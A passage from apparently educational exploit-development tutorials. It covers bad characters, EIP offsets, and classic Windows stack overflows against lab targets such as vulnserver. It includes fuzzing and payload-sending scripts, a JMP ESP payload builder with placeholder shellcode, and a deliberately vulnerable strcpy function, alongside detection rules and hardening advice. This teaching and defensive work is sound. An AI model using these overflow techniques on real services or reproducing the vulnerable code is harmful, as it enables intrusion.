  • ETW — subscribe to Microsoft-Windows-Threat-Intelligence (ETWTI) to observe injection and memory manipulation; Microsoft-Windows-Security-Auditing for process audit events.
  • Audit Process Creation (Detailed Tracking) → Security Event 4688 with command-line logging captures framework invocations.
  • WAF / network — flag URI patterns carrying buffer-overflow payloads; a burst of access-violation or segfault alerts in a short window signals active exploitation attempts.
  • Compiler mitigations/GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT raise the exploitation bar.
  • Input validation — allowlist legal characters at the boundary; explicitly reject \x00, \x0A, \x0D.
  • WDEG — enforce DEP and CFG per-process via Set-ProcessMitigation.
  • Memory integrity — flag executable pages not backed by a known on-disk image.
  • Deploy Sysmon with a community baseline (SwiftOnSecurity, olafhartong sysmon-modular) to ensure EID 10 captures CallTrace.

Hierarchy diagram mapping an exploit attempt to four detection and mitigation layers: network WAF, OS mitigations like DEP and CFG, Sysmon Event ID 10 with unknown CallTrace, ETWTI injection telemetry, and Security Event 4688 process creation logging
Defence-in-depth layers each intercept exploitation at a different stage — encoded shellcode evades transport filters but generates unmistakable runtime telemetry.

13. Tools for Bad-Character Analysis

ToolDescriptionLink
Immunity DebuggerCrash analysis, ESP dump inspectionimmunityinc.com
mona.pyBytearray generation and memory comparisongithub.com/corelan
WinDbgOpcode/gadget inspection, memory diffingmicrosoft.com
msfvenomShellcode generation and encoding (-b)offsec.com
Alpha2Standalone alphanumeric shellcode encodergithub.com
x64dbgUser-mode debugging and patchingx64dbg.com
GhidraStatic opcode/disassembly analysisghidra-sre.org
VolatilityMemory forensics, unbacked code regionsvolatilityfoundation.org

14. MITRE ATT&CK Mapping

Bad-char testing and shellcode crafting are pre-exploitation tradecraft with no standalone technique ID — they enable the techniques below.

TechniqueMITRE IDDetection
Exploitation for Client ExecutionT1203Process crash bursts, EID 1 framework launches
Exploit Public-Facing ApplicationT1190WAF anomalies, service access violations
Exploitation for Privilege EscalationT1068Local overflow → elevated process behavior
Obfuscated Files or InformationT1027Encoder signatures (shikata/alpha) on disk/wire
Process InjectionT1055Sysmon EID 8/10, UNKNOWN in CallTrace

Summary

  • Bad characters are application-defined bytes that corrupt, truncate, or transform shellcode before it reaches EIP — you must enumerate them empirically, never assume.
  • \x00 is always bad in string-based overflows because CRT functions like strcpy and strlen treat it as the terminator; sockets pass it but downstream string APIs still die on it.
  • Enumerate with a \x01\xFF byte array, diff memory using !mona compare, and remember only the first byte of a corrupted run is confirmed bad.
  • Adapt with msfvenom -b encoding (shikata_ga_nai, falling back to call4_dword_xor or alpha_mixed), jump-opcode substitution, and Venetian shellcode for Unicode buffers.
  • Detect the resulting payloads via Sysmon Event ID 10 with UNKNOWN CallTrace frames, ETWTI injection telemetry, and process-creation auditing (4688).

Related Tutorials

References

Finding the EIP Offset: Pattern Creation and Cyclic Patterns

Objective: Understand how to determine the exact EIP overwrite offset in a classic x86 stack-based buffer overflow by sending a cyclic (De Bruijn-derived) pattern, reading the value loaded into EIP at crash time, and calculating the precise byte distance from the buffer’s start to the saved return address — a repeatable, tool-agnostic workflow for authorized lab use.


1. Prerequisites and Lab Setup

This workflow assumes an isolated, authorized lab VM — never a production host. The classic offset-finding exercise targets a purpose-built vulnerable service such as vulnserver.exe or brainpan.exe, attached to a debugger.

You will need:

ComponentRole
Immunity DebuggerAttach to the target process and read register state at crash time.
mona.pyPattern generation and offset search inside Immunity.
Kali + Metasploitmsf-pattern_create / msf-pattern_offset wrappers.
Python 3 (+ pwntools)Scripted fuzzing, pattern delivery, and cyclic() math.

Attach Immunity to the running service (File → Attach), press F9 to resume, then drive input from your Python script across the network. Configure mona‘s working folder first:

!mona config -set workingfolder c:\mona\%p

2. The x86 Stack Frame: Why EIP Is the Target

EIP (Extended Instruction Pointer) is the 32-bit register holding the address of the next instruction. On function return, the ret instruction pops the saved return address off the stack into EIP. If you can overwrite that saved value, you control where execution flows next.

On a standard MSVC/GCC x86 cdecl frame, the layout is:

[  local buffer (N bytes)  ]   <- lower address, ESP near here on entry
[  saved EBP (4 bytes)     ]
[  saved EIP (4 bytes)     ]   <- overwrite target
[  function arguments      ]   <- higher address

The saved EIP sits above the saved EBP in the stack image. The offset is the byte distance from byte 0 of your input buffer to the first byte of saved EIP. ESP matters too: after ret, ESP advances past the popped return address and typically points directly into your attacker-controlled buffer region — the basis for later JMP ESP stages.


Diagram of x86 cdecl stack frame showing input buffer overflowing through local variables and saved EBP into the saved EIP return address, with ESP position after ret indicated
The saved EIP sits just above the saved EBP — overflowing the input buffer upward overwrites it and redirects execution.

3. From Fuzzing to Approximate Crash Size

The prior stage — fuzzing — delivers progressively larger buffers of A bytes (\x41) until the service dies. When the debugger shows EIP = 41414141, the saved return address has been fully overwritten with As. That confirms EIP control but tells you nothing about where in the buffer EIP lands.

import socket, time

ip, port = "192.168.56.10", 9999
size = 100
while True:
    try:
        with socket.create_connection((ip, port), timeout=5) as s:
            buf = b"A" * size
            s.send(b"TRUN /.:/" + buf)   # protocol-specific prefix
            print(f"[*] Sent {size} bytes")
            size += 100
            time.sleep(1)
    except Exception:
        print(f"[!] Crash near {size} bytes")
        break

Round the crash size up to a clean number — say 2000 bytes. That value becomes the pattern length.


4. The Mathematics of Cyclic Patterns

EIP = 41414141 is ambiguous because every byte is identical. The fix is a cyclic pattern: a string in which every fixed-length substring appears exactly once. Find which substring landed in EIP, and you have the offset.

ConceptDetail
De Bruijn sequenceA sequence where every possible subsequence of a fixed length appears exactly once. This uniqueness is what makes offset lookup deterministic.
Why it worksThe overwriting bytes are popped into EIP on ret. Because each 4-byte window is unique, the EIP value maps to exactly one position in the input.
Metasploit variantMetasploit patterns use a different algorithm than true De Bruijn but serve the same purpose, drawing from uppercase letters, lowercase letters, and digits.
3-char uniquenesspattern_create produces a string where every three-character substring is unique: Aa0Aa1Aa2Aa3Aa4....

pwntools cyclic() generates a true De Bruijn sequence; msf-pattern_create uses the alphabet-based approach. Both yield a unique mapping you can query.


Flow diagram showing the complete cyclic pattern offset-finding workflow from initial fuzzing crash through pattern generation, delivery, EIP value capture, offset calculation, and BBBB verification
A De Bruijn cyclic pattern makes every 4-byte window unique, collapsing the offset problem to a single deterministic lookup.

5. Generating the Pattern: Three Tool Paths

Generate a pattern equal to (or slightly larger than) the crash size. The -l flag is length; the -q flag (next section) is the query value.

Metasploit (Bash):

# Generate a 2000-byte non-repeating pattern
msf-pattern_create -l 2000
# Or the script directly:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000

mona.py (Immunity command bar):

!mona pc 2000

pwntools (Python 3):

from pwn import *
pattern = cyclic(2000)
print(pattern)

Tip: Generate a pattern 400 bytes larger than the crash buffer to also reveal whether shellcode space exists immediately after the EIP overwrite.


6. Sending the Pattern and Capturing the EIP Value

Replace the A buffer in your fuzzing script with the generated pattern, reattach Immunity, and reproduce the crash.

import socket

pattern = b"Aa0Aa1Aa2Aa3Aa4..."   # paste msf-pattern_create -l 2000 output
ip, port = "192.168.56.10", 9999

with socket.create_connection((ip, port)) as s:
    s.send(b"TRUN /.:/" + pattern)

When the process faults, read the 4-byte EIP value from Immunity’s register panel — for example 6F43396E.

Little-endian note: Values are written to the stack least-significant-byte first. A debugger may display the register as 6F43396E. Tools like pattern_offset handle endianness internally, so pass the displayed value as-is. A manual ASCII lookup, however, requires reversal: 6F43396E6E39436Fn9Co.


7. Calculating the Exact Offset

Feed the EIP value into any of the three tools. All return the same byte distance.

Metasploit (Bash):

# -q is the query switch; pass the EIP value from the debugger
msf-pattern_offset -l 2000 -q 6F43396E
# Output:
# [*] Exact match at offset 1978

mona.py (Immunity): findmsp searches every register and the stack against the pattern.

!mona findmsp -distance 2000

Read the log line:

EIP contains normal pattern : ... (offset 1978)

(!mona po 6F43396E performs the same lookup by hex value.)

pwntools (Python 3): cyclic_find accepts the packed 4-byte value.

from pwn import *
offset = cyclic_find(p32(0x6161616c))   # value read from EIP
print(offset)                            # -> integer byte offset

gdb-peda‘s pattern_search reports all three at once on Linux targets — e.g. EIP+0 found at offset: 1040 and [ESP] --> offset 1044 — useful for spotting where ESP lands relative to EIP.


8. Verifying EIP Control

Never trust a calculated offset blindly. Confirm it by overwriting EIP with a known marker. Set payload to empty and retn to "BBBB":

import socket

prefix   = b"TRUN /.:/"
offset   = 1978
overflow = b"A" * offset
retn     = b"BBBB"          # 0x42424242
payload  = b""              # no payload yet — verification only

buf = prefix + overflow + retn + payload

with socket.create_connection(("192.168.56.10", 9999)) as s:
    s.send(buf)

Reload the app in Immunity and re-send. If the offset is correct, EIP shows 42424242 — the hex of “BBBB”. You now control execution flow exactly. Confirm ESP also points into your buffer; that location holds the bytes that follow retn and becomes your future code-redirect landing zone.

The conceptual stack image after the overwrite:

[ AAAA AAAA ... AAAA ]   offset bytes filling buffer + saved EBP
[ BBBB ]                 saved EIP = 0x42424242  (controlled)
[ CCCC ... ]             ESP region (future shellcode space)

Diagram of stack after controlled EIP overwrite showing padding bytes up to the exact offset, BBBB value in saved EIP slot, and ESP pointing to the attacker-controlled region immediately after
EIP showing 0x42424242 confirms the offset is exact; ESP now points into your buffer, establishing the foundation for a JMP ESP redirect.

9. Common Pitfalls and Edge Cases

  • Pattern shorter than the real offset: EIP holds bytes from beyond your pattern; the offset tool returns no match. Regenerate longer.
  • Bad characters: Bytes like \x00, \x0a, \x0d can truncate or corrupt the pattern mid-stream, shifting EIP unpredictably. Bad-char analysis is a separate stage.
  • Modern mitigations: ASLR and DEP/NX invalidate the naive EIP→ESP→shellcode chain on hardened targets. The offset still exists, but exploitation requires bypasses (covered in later tutorials).
  • SEH-based overflows: When the buffer overruns the Structured Exception Handler instead of the saved return address, EIP may not show pattern bytes directly — !mona findmsp will instead report the offset to the SEH/nSEH records.

10. Common Attacker Techniques

Offset discovery is a development sub-step that feeds the techniques below.

TechniqueDescription
Stack buffer overflowOverrun a fixed local buffer to overwrite the saved return address.
Cyclic pattern offset findingDeterministically locate the EIP overwrite distance, as taught here.
EIP redirection via JMP ESPOnce the offset is known, replace retn with the address of a JMP/CALL ESP gadget.
SEH overwriteVariant overflow that hijacks the exception handler chain instead of ret.

11. Defensive Strategies and Detection

Detection splits into two contexts: catching exploitation attempts against a service, and catching the crash-loop behaviour of fuzzing/pattern delivery.

Crash and process telemetry:

  • Application Error — Event ID 1000 (Application log): logged on 0xC0000005 (Access Violation) when EIP corruption kills the process; the faulting address is the pattern value (e.g. 0x41307241).
  • Windows Error Reporting — Event ID 1001: WER bucket data, faulting instruction pointer, and dump path for post-crash forensics.
  • Sysmon Event ID 3 (Network Connection): repeated high-rate TCP connections to a single service port during fuzzing and pattern delivery are anomalous — watch DestinationPort and SourceIp.
  • Sysmon Event ID 1 (Process Create): child processes spawned if the overflow reaches code execution — inspect CommandLine, ParentImage, IntegrityLevel.

ETW providers: Microsoft-Windows-WER-SystemErrorReporting emits access-violation crash events; Microsoft-Windows-Kernel-Process reveals abnormal crash-and-restart loops via process start/stop events. Forward both to a SIEM.

A repeated-crash detection sketch (illustrative):

title: Repeated Application Crash Loop (Possible Buffer Overflow Fuzzing)
logsource:
  product: windows
  service: application
detection:
  selection:
    EventID: 1000
    ExceptionCode: '0xc0000005'   # Access Violation
  timeframe: 1m
  condition: selection | count() > 5   # repeated crashes = fuzzing indicator
level: high

Hardening checklist (raises the bar from “find the bug” to “bypass every mitigation”):

  • Compile with /GS stack security cookies — a mismatch triggers __security_check_cookie() and terminates before ret.
  • Enable DEP/NX system-wide: bcdedit /set nx AlwaysOn.
  • Enable ASLR: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages = 1.
  • Compile with Control Flow Guard: /guard:cf.
  • Link with SafeSEH (/SAFESEH) to block SEH overwrites on x86.
  • Replace unbounded strcpy, gets, scanf("%s", ...) with strcpy_s, strncpy_s, gets_s.
  • Run Application Verifier with heap and stack checks during development.

These map to MITRE mitigation M1050 — Exploit Protection.


12. Tools for Offset Analysis

ToolDescriptionLink
msf-pattern_create / pattern_create.rbGenerate a non-repeating pattern of length -l.metasploit.com
msf-pattern_offset / pattern_offset.rbQuery offset with -q <EIP_HEX>.metasploit.com
mona.py!mona pc, !mona findmsp, !mona po inside Immunity.github.com
Immunity DebuggerAttach, reproduce crash, read EIP/ESP.immunityinc.com
pwntoolscyclic() / cyclic_find() De Bruijn math.github.com
GDB + PEDApattern_search reports EBP/EIP/ESP offsets.github.com

13. MITRE ATT&CK Mapping

Offset finding is a pre-exploitation development sub-step with no dedicated technique ID; it supports the techniques below.

TechniqueMITRE IDDetection
Exploitation for Client ExecutionT1203Crash telemetry (Event ID 1000), anomalous child processes (Sysmon ID 1).
Exploitation for Privilege EscalationT1068Access-violation crashes in privileged services; WER buckets.
Exploit Public-Facing ApplicationT1190High-rate TCP to a service port (Sysmon ID 3); crash loops.
Exploitation for Defense EvasionT1211Memory-corruption indicators; EDR memory hooks.
Exploit Protection (Mitigation)M1050DEP, ASLR, CFG, /GS, SafeSEH.

Summary

  • The EIP offset is the exact byte distance from your buffer’s start to the saved return address — and a cyclic pattern finds it deterministically.
  • A De Bruijn / Metasploit pattern makes every fixed-length window unique, so the value popped into EIP maps to a single position.
  • Generate with msf-pattern_create, !mona pc, or cyclic(); resolve with msf-pattern_offset -q, !mona findmsp, or cyclic_find().
  • Verify by overwriting EIP with "BBBB" and confirming EIP = 42424242; remember little-endian display order.
  • Defenders catch the activity via Event ID 1000 (0xC0000005) crash loops and Sysmon Event ID 3 connection floods; M1050 controls (DEP, ASLR, CFG, /GS) raise the exploitation bar dramatically.

Related Tutorials

References

Classic Stack Buffer Overflow: Smashing the Stack on Windows

Objective: Understand how a classic stack-based buffer overflow corrupts a Windows x86 call frame, hijacks the saved EIP, and redirects execution through a JMP ESP trampoline — and how /GS, SafeSEH, SEHOP, DEP, and ASLR defeat or complicate it, so you can detect and defend against this vulnerability class in authorized lab work.


1. Windows Memory Layout Primer

Every Windows process runs inside a private virtual address space. On x86 (32-bit), that space spans 0x000000000x7FFFFFFF for user mode. The stack grows downward (high to low addresses) and stores function call frames; the heap grows upward and serves dynamic allocations.

The CPU tracks two stack-relevant registers and one execution register:

  • ESP — stack pointer, the current top of stack.
  • EBP — base/frame pointer, anchors the current frame.
  • EIP — instruction pointer, the address of the next instruction. This is the attacker’s target.

A CALL instruction pushes the return address (the next EIP) onto the stack and jumps to the target. The matching RET pops that saved address back into EIP. If an attacker overwrites the saved return address on the stack, RET transfers control wherever they choose.

x86 is little-endian: the address 0x625011AF is written in the payload as the byte sequence \xAF\x11\x50\x62. This byte ordering matters for every address you place into an exploit buffer.


2. Anatomy of a Stack Frame

A standard cdecl/stdcall function frame is built by the prologue and torn down by the epilogue. Laid out high → low address:

Stack SlotDescription
Function argumentsPushed by caller before CALL
Saved EIP (return address)Pushed implicitly by the CALL instruction
Saved EBPPushed by callee prologue (PUSH EBP)
/GS stack cookie (if present)Inserted between locals and saved EBP/EIP
Local variables / buffersAllocated by SUB ESP, N
ESP (stack top)Grows downward

The prologue and epilogue, with the /GS cookie check shown, look like this:

; --- Prologue ---
push    ebp                 ; save caller frame pointer
mov     ebp, esp            ; establish new frame
sub     esp, 0x40           ; allocate 64 bytes of locals
mov     eax, [__security_cookie]
xor     eax, ebp            ; cookie ^= EBP (frame-tied canary)
mov     [ebp-4], eax        ; store cookie above locals

; --- Epilogue ---
mov     ecx, [ebp-4]
xor     ecx, ebp
call    __security_check_cookie  ; compare vs master; abort on mismatch
mov     esp, ebp
pop     ebp                 ; restore caller frame pointer
ret                         ; pop saved EIP into instruction pointer

Reading this frame live in WinDbg or x64dbg — inspecting ESP, EBP, and the bytes between locals and the saved return address — is the first skill of exploit development.


Diagram of an x86 Windows stack frame showing the order from high to low address: function arguments, saved return EIP, saved EBP, GS cookie, local buffer, and ESP
A standard x86 cdecl stack frame — the saved return EIP sits just above EBP, making it the prime overwrite target when a local buffer overflows upward.

3. The Overflow: Why Bounds Checks Matter

The root cause is always the same: a copy operation that writes more bytes into a fixed-size stack buffer than the buffer holds. The classic offenders are CRT functions that perform no bounds checking.

IdentifierWhat it does
strcpy, strcat, gets, sprintf, scanfUnsafe CRT functions with no bounds checking — classic root causes
memcpy(dst, src, count)Copies count bytes regardless of dst size; dangerous when count is attacker-controlled

Here is the canonical vulnerable pattern defenders must recognize in code review:

#include <string.h>

// DELIBERATELY VULNERABLE — lab use only.
void handle_request(char *attacker_input) {
    char buffer[64];            // fixed 64-byte stack buffer
    strcpy(buffer, attacker_input);  // no length check — overflow
}

When attacker_input exceeds 64 bytes, the copy walks past buffer, overwrites the saved EBP, then the saved EIP. Supply a long run of 0x41 ('A') and the program crashes with an access violation as the CPU tries to execute at EIP = 0x41414141. That controlled crash is proof you own the instruction pointer.

When compiled with MSVC /GS- (cookie disabled), the prologue omits the xor/store and the epilogue omits __security_check_cookie entirely — a linear overflow reaches the return address unobstructed. Diffing the /GS vs /GS- disassembly in a debugger is the clearest way to see the cookie.


4. Exploit Development Methodology on Windows

The classic workflow is a tight loop against an intentionally vulnerable target in an isolated VM:

  1. Fuzz to crash — send increasing-length inputs until the service faults.
  2. Find the offset — send a cyclic (de Bruijn) pattern, read the value in EIP at crash, compute the exact distance to the return address.
  3. Confirm EIP control — overwrite with a known marker (0x42424242) and verify.
  4. Enumerate bad characters — find bytes the protocol mangles (\x00, \x0a, \x0d are common).
  5. Find a trampoline — locate JMP ESP in a non-ASLR module.
  6. Build the payload — padding + trampoline address + NOP sled + shellcode.

A minimal network fuzzer:

import socket, time

target = ("192.168.56.20", 9999)
size = 100
while size < 4000:
    try:
        s = socket.socket()
        s.connect(target)
        buf = b"TRUN /.:/" + b"A" * size      # protocol prefix + payload
        s.send(buf)
        s.close()
        print(f"[+] sent {size} bytes")
        size += 200
        time.sleep(1)
    except Exception:
        print(f"[!] crashed at ~{size} bytes")
        break

Offset discovery with a cyclic pattern (generated by pwntools or !mona pattern_create):

from pwn import cyclic, cyclic_find

pattern = cyclic(3000)                 # de Bruijn sequence
# ... send pattern, read EIP from the debugger at crash (e.g. 0x6f43396e) ...
offset = cyclic_find(0x6f43396e)       # exact bytes before saved EIP
print(f"[+] EIP offset = {offset}")

Bad-character enumeration sends the full byte range and diffs it against memory:

badchar_test = bytes(b for b in range(1, 256))   # skip \x00 first
# Send, then in the debugger: d esp  -> compare bytes in memory
# Any byte missing/truncated is a bad char; rebuild excluding it.

The final builder assembles the pieces. Note the placeholder shellcode — generate benign calc-popping shellcode with msfvenom in your own lab; never embed working shellcode in a tutorial:

from pwn import p32

offset    = 2003
jmp_esp   = 0x625011AF          # FF E4 in a non-ASLR module
nop_sled  = b"\x90" * 16
# shellcode = b"[MSFVENOM_OUTPUT_HERE]"  # generated in your lab, -b "\x00\x0a\x0d"
shellcode = b"\x90" * 32         # placeholder

payload = b"A" * offset + p32(jmp_esp) + nop_sled + shellcode

The key opcodes you search modules for:

Opcode bytesInstructionUse
FF E4JMP ESPClassic return trampoline
FF D4CALL ESPEquivalent effect
FF E5JMP EBPWhen EBP points near the buffer
EB 06Short JMP +6Next-SEH jump-over gadget

Because ESP points at the attacker’s buffer when RET executes, returning into JMP ESP immediately pivots execution into the NOP sled and shellcode.


Flow diagram of the six-step Windows stack overflow exploit development methodology from fuzzing through payload construction
The exploit development loop progresses from controlled crash to precise EIP hijack, terminating in a JMP ESP trampoline payload that pivots into a NOP sled and shellcode.

5. Windows Mitigations Deep-Dive

Modern Windows defaults make the naïve attack above fail. Each mitigation targets a different stage.

MitigationMechanismBypass vector (teaching)
/GS (stack cookie)Random DWORD cookie between locals and saved EBP/EIP; checked in epilogueSEH overwrite before the cookie check; cookie leak
SafeSEHPE table of valid SEH handlers; loader validates the handler before dispatchTrampoline in a module not compiled /SAFESEH
SEHOPValidates the SEH chain reaches FinalExceptionHandler at dispatchChain spoofing; non-opted-in modules
DEP/NX (/NXCOMPAT)Pages are W^X; the stack is non-executableROP chain (follow-on topic)
ASLR (/DYNAMICBASE)Randomizes image/stack/heap basePartial overwrites, info leaks (follow-on topic)

/GS computes a program-wide master cookie at startup via __security_init_cookie(), stored in the module’s .data section. The prologue copies it onto the stack between the locals and the saved frame pointer; the epilogue runs __security_check_cookie(), which calls __report_gsfailure() on mismatch. Microsoft shipped /GS in Visual Studio 2003 and enabled it by default in 2005. Variable reordering moves arrays and structs to the highest part of the frame so a linear overflow cannot clobber other locals before reaching the cookie.

The original /GS only protected arrays of 8+ elements with element size 1 or 2; the later GS++ expanded coverage to any array and any struct regardless of size. The critical limitation: /GS does not protect exception handler records. DEP and ASLR are not stack-specific — they do not stop the overflow or the EIP hijack; they make running shellcode far harder.


Hierarchy diagram of Windows stack overflow mitigations including GS cookie, SafeSEH, SEHOP, DEP, and ASLR with compiler versus OS grouping
Windows layers compiler-enforced mitigations (/GS, SafeSEH) with OS-level controls (SEHOP, DEP, ASLR) — each targets a distinct stage of the exploit chain.

6. SEH-Based Overflow (x86)

On x86, Structured Exception Handling chains live on the stack as linked EXCEPTION_REGISTRATION_RECORD nodes:

typedef struct _EXCEPTION_REGISTRATION_RECORD {
    struct _EXCEPTION_REGISTRATION_RECORD *Next;   // next handler in chain
    PEXCEPTION_ROUTINE                     Handler; // SE handler function ptr
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;

When a function uses try/except, this record sits on the stack beside the /GS cookie. If the attacker overflows far enough to overwrite both Next SEH and SE Handler, then triggers an exception before the epilogue runs __security_check_cookie(), the OS dispatches to the attacker-controlled handler — bypassing the cookie entirely.

The standard technique overwrites SE Handler with the address of a POP–POP–RET gadget inside a loaded module. At dispatch, the stack arrangement places a pointer to the Next SEH field where RET lands; POP–POP–RET unwinds two slots and returns into the attacker’s Next SEH value, which is typically a short jump (EB 06) over the handler bytes into the shellcode.

SafeSEH breaks this by validating the handler against the PE’s registered-handler table; attackers respond by sourcing the gadget from a module not built with /SAFESEH. SEHOP (default since Vista SP1) walks the chain to confirm it terminates at FinalExceptionHandler, defeating a naively overwritten chain. On 64-bit, exception data is table-based and no longer stored on the stack, so this primitive does not apply.


Flow diagram showing the SEH-based stack overflow attack chain from buffer overflow through exception dispatch, POP-POP-RET gadget, and short jump into shellcode
Overwriting the SEH record and triggering an exception before the /GS epilogue runs lets attackers bypass the stack cookie entirely via a POP–POP–RET trampoline.

7. Lab Walkthrough: Exploiting an Intentionally Vulnerable Binary

Perform every step against a purpose-built target — VulnServer, brainpan, or a custom binary compiled with /GS- — inside an isolated VM with no network access to production. The two-phase approach makes the mitigations tangible:

  1. No-protections build: Compile with /GS- /NXCOMPAT:NO /DYNAMICBASE:NO. Run the fuzzer (§4), crash the service, find the offset with a cyclic pattern, confirm EIP control, enumerate bad chars, locate JMP ESP with mona.py, and land in a NOP sled.
  2. /GS-only build: Recompile with /GS enabled, replay the same payload, and watch __security_check_cookie detect the corrupted canary and terminate the process via __report_gsfailure() — the same input that worked now dies in the epilogue.

Reference debugger and mona.py commands:

0:000> g                      ; run until crash
0:000> r                      ; read registers — expect EIP = 41414141
0:000> d esp                  ; dump stack at ESP — find your buffer
0:000> !exploitable           ; triage the crash classification
0:000> bp 0x625011AF          ; break on the JMP ESP trampoline
!mona findmsp                          ; locate cyclic pattern, report EIP offset
!mona jmp -r esp -cpb "\x00\x0a\x0d"   ; find JMP ESP excluding bad chars
!mona bytearray -cpb "\x00"            ; generate byte array for badchar diffing

8. Common Attacker Techniques

TechniqueDescription
Linear stack smashOverflow a buffer to overwrite saved EIP with a JMP ESP trampoline
SEH overwriteOverwrite Next SEH + SE Handler, trigger an exception to bypass /GS
Non-SafeSEH trampolineSource POP–POP–RET / JMP ESP gadgets from modules lacking /SAFESEH
Bad-char-safe encodingEncode shellcode to avoid protocol-mangled bytes (\x00, \x0a, \x0d)
Egghunter / stagingUse a small first-stage to locate or download a larger payload
Post-exploit VirtualProtectMark injected memory executable to evade software DEP in legacy scenarios

In practice the attacker chains these: a SEH overwrite defeats the cookie, a non-SafeSEH gadget defeats SafeSEH, and a ROP stub built from non-ASLR module gadgets defeats DEP before transferring to shellcode.


9. Defensive Strategies & Detection

Sysmon does not emit a “buffer overflow” event. The crash surfaces through Windows Error Reporting, and the post-exploitation behavior surfaces through Sysmon.

  • WER Event ID 1000 (Application Error, Application log) — logs the faulting module, ExceptionCode = 0xC0000005 (access violation), faulting offset, and thread ID. A 0xC0000005 at a non-canonical offset in a network-facing service is high-fidelity.
  • WER Event ID 1001 — records the crash bucket and any captured dump.

Relevant Sysmon events for follow-on activity:

Event IDNameRelevance
1Process CreationShells/payloads spawned from a crashed service
3Network ConnectionReverse-shell / C2 egress from shellcode
7Image LoadedUnexpected ws2_32.dll load by a non-network service
8CreateRemoteThreadThread injection by shellcode
10Process AccessShellcode calling OpenProcess on lsass.exe
11File CreatedDropped payloads / second-stage binaries
25Process TamperingProcess hollowing following the overflow

Useful ETW providers: Microsoft-Windows-WER-Diag (crash diagnostics), Microsoft-Windows-Security-Mitigations (WDEG/Exploit Guard triggers, in /KernelMode and /UserMode channels), and Microsoft-Windows-Kernel-Process. Enable Audit Process Creation (4688) with command-line logging and Audit Process Termination (4689) to catch crash/restart loops.

A conceptual Sigma rule keying on repeated crashes of a network-facing service:

title: Repeated Application Crash on Network-Facing Service
logsource:
  product: windows
  service: application
detection:
  selection:
    EventID: 1000
    Application|contains: 'vulnservice.exe'
    ExceptionCode: '0xc0000005'
  condition: selection | count() > 3 by Application within 1m
falsepositives:
  - Legitimate software bugs
level: medium
tags:
  - attack.initial_access
  - attack.T1190

Hardening Steps

  1. Force WDEG / Exploit Protection on network-facing services — mandatory DEP, force-ASLR, SEHOP, heap-spray protection via Set-ProcessMitigation.
  2. Build with /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT and audit your pipeline for them.
  3. Verify SEHOPHKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\DisableExceptionChainValidation = 0.
  4. Forward WER Event ID 1000 to the SIEM and alert on repeated crashes of one process.
  5. Use AddressSanitizer (/fsanitize=address, MSVC ≥ VS 2019 16.9) in dev/test to catch OOB writes.
  6. Rate-limit oversized inputs at the WAF/NGFW; alert on crash surges.
  7. Run services least-privilege so successful exploitation yields minimal access.

10. Tools for Stack Overflow Analysis

ToolDescriptionLink
WinDbgKernel/user debugger; !exploitable crash triagemicrosoft.com
x64dbgUser-mode debugger for live frame inspectionx64dbg.com
mona.pyImmunity/WinDbg plugin for offsets, trampolines, bad charsgithub.com
pwntoolsPython exploit-dev framework (cyclic, p32)pwntools.com
ROPgadgetGadget discovery for DEP-bypass chainsgithub.com
GhidraStatic disassembly / decompilation for code reviewghidra-sre.org
SysmonEndpoint telemetry for post-exploitation behaviormicrosoft.com

11. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Exploit Public-Facing ApplicationT1190WER EventID 1000 crash bursts; WAF oversized-input alerts
Exploitation for Privilege EscalationT1068Service running as SYSTEM crashing then spawning children
Exploitation for Client ExecutionT1203Client app (parser/player) crash + child process via Sysmon EventID 1
Endpoint DoS: Application ExploitationT1499.004Repeated crash/restart loops (4689, WER 1000)
Exploit Protection (mitigation)M1050DEP/ASLR/SEHOP//GS enforced via WDEG telemetry

Stack buffer overflow is a vulnerability primitive, not a standalone ATT&CK technique. T1190 and T1068 are the canonical mappings for the adversarial behavior that uses it.


Summary

  • A classic stack buffer overflow overwrites the saved return address to hijack EIP and pivot execution into attacker-controlled shellcode via a JMP ESP trampoline.
  • The x86 frame places locals, an optional /GS cookie, saved EBP, and the return EIP in a predictable order that linear overwrites exploit.
  • /GS inserts a stack canary checked in the epilogue, but does not protect SEH records — the SEH overwrite is the canonical x86 bypass, in turn countered by SafeSEH and SEHOP.
  • DEP and ASLR do not stop the overflow itself; they force ROP and info-leak techniques to run shellcode.
  • Detect via WER Event ID 1000 (0xC0000005) crash bursts plus Sysmon post-exploitation events, and harden with WDEG, /GS /SAFESEH /DYNAMICBASE /NXCOMPAT, SEHOP, and least privilege.

Related Tutorials

References

Understanding the Stack: Frames, Prologue/Epilogue, and Stack Layout

Objective: Understand how the call stack is organized in x86 and x64 Windows processes — the mechanics of stack frames, function prologue/epilogue sequences, calling conventions, shadow space, and the exact memory layout a debugger reveals — so you can recognize a healthy stack versus a corrupted one and reason precisely about stack-based exploitation and its defenses.


1. Why the Stack Matters for Exploit Development

The stack is the primary battleground for classic memory-safety bugs. Saved return addresses, saved frame pointers, function arguments, and fixed-size local buffers all live side by side on the same contiguous, downward-growing region. When a write runs past the end of a stack buffer, it corrupts the very control-flow data the CPU will trust on the next RET.

For a defender, the same knowledge is diagnostic. A return address pointing into the stack or heap instead of an executable image, an RSP value that jumped thousands of bytes (a stack pivot), or a frame chain that no longer links cleanly are all signatures of corruption. You cannot recognize an abnormal stack until you have internalized a normal one.


2. The Stack as a Data Structure: Growth Direction and Address Space Layout

A Windows process virtual address space holds the mapped image (.text, .data), loaded DLLs, the heap, thread stacks, and per-thread/per-process control structures (TEB/PEB). Each thread receives its own stack, reserved and committed on demand.

The stack grows downward — toward lower addresses. PUSH decrements the stack pointer; POP increments it. The live top of the stack is always tracked by RSP (x64) / ESP (x86).

RegisterRole
RSP / ESPStack pointer — always points to the top (lowest address) of the current frame
RBP / EBPBase/frame pointer — anchors the frame in x86; in x64 not used for locals/args unless alloca() is used
RIP / EIPInstruction pointer — saved as the return address by CALL
RAXInteger/pointer return value (XMM0 for floating-point)

3. x86 Stack Frames: Registers, Calling Conventions, and the EBP Chain

32-bit Windows supports several co-existing calling conventions, which is why x86 reversing requires you to identify the convention before reading arguments.

ConventionCleanupArgument Passing
__cdeclCaller cleansRight-to-left on stack
__stdcallCallee cleansRight-to-left on stack (Win32 API)
__fastcallCallee cleansFirst two in ECX/EDX, rest on stack
